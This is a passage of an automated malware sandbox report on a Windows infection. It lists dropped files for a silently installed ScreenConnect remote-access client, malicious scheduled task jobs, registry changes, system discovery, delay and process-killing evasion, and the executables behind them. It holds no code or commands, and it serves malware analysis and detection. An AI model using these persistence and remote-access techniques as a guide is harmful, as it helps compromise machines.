File created C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\app.config C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\Client.Override.resources C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\system.config C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.ClientService.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.WindowsBackstageShell.exe C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.WindowsBackstageShell.exe.config C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.WindowsClient.exe C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\Client.en-US.resources C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\Client.Override.en-US.resources C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\Client.resources C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.Core.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.Windows.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.WindowsFileManager.exe.config C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.Client.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.WindowsAuthenticationPackage.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.WindowsClient.exe.config C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.WindowsCredentialProvider.dll C:\Windows\system32\msiexec.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\Installer\e58a073.msi C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\{933D173F-6496-0F7D-53C4-FF46268B901A}\DefaultIcon C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\SourceHash{933D173F-6496-0F7D-53C4-FF46268B901A} C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\{933D173F-6496-0F7D-53C4-FF46268B901A}\DefaultIcon C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Tasks\Gxtuum.job N/A N/A
File created C:\Windows\Tasks\rapes.job C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\1J19x2.exe N/A
File opened for modification C:\Windows\Installer\ C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIA1CA.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIA1AA.tmp C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Tasks\Test Task17.job N/A N/A
File created C:\Windows\Installer\e58a071.msi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\e58a071.msi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\inprogressinstallinfo.ipi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIA2D5.tmp C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\wix{933D173F-6496-0F7D-53C4-FF46268B901A}.SchedServiceConfig.rmi N/A N/A

Browser Information Discovery

discovery

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10021570101\VBUN8fn.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10022320101\67e0HNq.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\1J19x2.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10000540101\bgUvqLl.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10003000101\0aa5fc75e8.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\rundll32.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\3P97i.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\daec7b03c98cabb50f94c5ddf9ca7063918b9859291caadaf4cb75f954a4ab30.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\C4O51.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\syswow64\MsiExec.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10019810101\6NPpGdC.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10000650101\Y9WG5Ep.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\timeout.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\msiexec.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10019810101\6NPpGdC.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10003000101\0aa5fc75e8.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10008470101\E3WGlpL.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\2N2602.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language N/A N/A

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters C:\Windows\system32\vssvc.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters C:\Windows\system32\vssvc.exe N/A
Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr C:\Windows\system32\vssvc.exe N/A
Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr\PartitionTableCache = 0000000004000000cad1f625b0a3f6470000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000000000000c01200000000ffffffff000000002701010000080000cad1f6250000000000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000d01200000000000020ed3a000000ffffffff000000000700010000680900cad1f625000000000000d012000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000f0ff3a0000000000000005000000ffffffff000000000700010000f87f1dcad1f625000000000000f0ff3a00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff000000000000000000000000cad1f62500000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 C:\Windows\system32\vssvc.exe N/A
Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr\SnapshotDataCache = 534e41505041525401000000700000008ec7416a0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 C:\Windows\system32\vssvc.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString N/A N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 N/A N/A

Delays execution with timeout.exe

defense_evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A
N/A N/A N/A N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Kills process with taskkill

defense_evasion
Description Indicator Process Target
N/A N/A N/A N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ N/A N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" N/A N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" N/A N/A
Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\26\52C64B7E C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" N/A N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" N/A N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" N/A N/A
Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" N/A N/A
Key deleted \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26 C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ N/A N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\27 C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" N/A N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" N/A N/A
Set value (int) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133851043978588988" C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\MACHINE\Software\Classes\sc-3be09d9e5e840c20\shell\open\command C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\sc-3be09d9e5e840c20\shell C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\sc-3be09d9e5e840c20\shell\open C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F371D3396946D7F0354CFF6462B809A1\Language = "1033" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F371D3396946D7F0354CFF6462B809A1\SourceList\Net C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F371D3396946D7F0354CFF6462B809A1\SourceList\LastUsedSource = "n;1;C:\\Users\\Admin\\AppData\\Local\\Temp\\ScreenConnect\\24.4.4.9118\\3be09d9e5e840c20\\" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\sc-3be09d9e5e840c20\shell\open\command C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\CLSID\{6FF59A85-BC37-4CD4-A613-D378E3178387} C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\F371D3396946D7F0354CFF6462B809A1\Full C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F371D3396946D7F0354CFF6462B809A1\Version = "402915332" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F371D3396946D7F0354CFF6462B809A1\ProductIcon = "C:\\Windows\\Installer\\{933D173F-6496-0F7D-53C4-FF46268B901A}\\DefaultIcon" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\sc-3be09d9e5e840c20 C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\sc-3be09d9e5e840c20\shell\open\command\ = "\"C:\\Program Files (x86)\\ScreenConnect Client (3be09d9e5e840c20)\\ScreenConnect.WindowsClient.exe\" \"%1\"" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6FF59A85-BC37-4CD4-A613-D378E3178387}\InprocServer32\ThreadingModel = "Apartment" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\F371D3396946D7F0354CFF6462B809A1 C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F371D3396946D7F0354CFF6462B809A1 C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F371D3396946D7F0354CFF6462B809A1\AdvertiseFlags = "388" C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F371D3396946D7F0354CFF6462B809A1\DeploymentFlags = "3" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\E4BCFB79704FF87AB30ED9E9E548C002 C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\sc-3be09d9e5e840c20 C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\sc-3be09d9e5e840c20\URL Protocol C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\sc-3be09d9e5e840c20\UseOriginalUrlEncoding = "1" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F371D3396946D7F0354CFF6462B809A1\ProductName = "ScreenConnect Client (3be09d9e5e840c20)" C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F371D3396946D7F0354CFF6462B809A1\Assignment = "1" C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F371D3396946D7F0354CFF6462B809A1\InstanceType = "0" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F371D3396946D7F0354CFF6462B809A1\SourceList\PackageName = "ScreenConnect.ClientSetup.msi" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F371D3396946D7F0354CFF6462B809A1\SourceList\Net\1 = "C:\\Users\\Admin\\AppData\\Local\\Temp\\ScreenConnect\\24.4.4.9118\\3be09d9e5e840c20\\" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6FF59A85-BC37-4CD4-A613-D378E3178387}\ = "ScreenConnect Client (3be09d9e5e840c20) Credential Provider" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\CLSID\{6FF59A85-BC37-4CD4-A613-D378E3178387}\InprocServer32 C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F371D3396946D7F0354CFF6462B809A1\SourceList\Media C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6FF59A85-BC37-4CD4-A613-D378E3178387}\InprocServer32\ = "C:\\Program Files (x86)\\ScreenConnect Client (3be09d9e5e840c20)\\ScreenConnect.WindowsCredentialProvider.dll" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F371D3396946D7F0354CFF6462B809A1\PackageCode = "F371D3396946D7F0354CFF6462B809A1" C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F371D3396946D7F0354CFF6462B809A1\AuthorizedLUAApp = "0" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F371D3396946D7F0354CFF6462B809A1\SourceList\Media\1 = ";" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\E4BCFB79704FF87AB30ED9E9E548C002\F371D3396946D7F0354CFF6462B809A1 C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F371D3396946D7F0354CFF6462B809A1\SourceList C:\Windows\system32\msiexec.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F371D3396946D7F0354CFF6462B809A1\Clients = 3a0000000000 C:\Windows\system32\msiexec.exe N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\2N2602.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\2N2602.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\2N2602.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\2N2602.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\2N2602.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\2N2602.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\3P97i.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\3P97i.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10000540101\bgUvqLl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10000540101\bgUvqLl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10000650101\Y9WG5Ep.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10000650101\Y9WG5Ep.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10000650101\Y9WG5Ep.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10000650101\Y9WG5Ep.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10000650101\Y9WG5Ep.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10000650101\Y9WG5Ep.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10003000101\0aa5fc75e8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10003000101\0aa5fc75e8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10003000101\0aa5fc75e8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10003000101\0aa5fc75e8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10008470101\E3WGlpL.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10008470101\E3WGlpL.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10008470101\E3WGlpL.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10008470101\E3WGlpL.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10008470101\E3WGlpL.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10008470101\E3WGlpL.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10019810101\6NPpGdC.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10019810101\6NPpGdC.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10019810101\6NPpGdC.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10019810101\6NPpGdC.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10021570101\VBUN8fn.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10021570101\VBUN8fn.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10021570101\VBUN8fn.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10021570101\VBUN8fn.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\system32\msiexec.exe N/A
N/A N/A C:\Windows\system32\msiexec.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
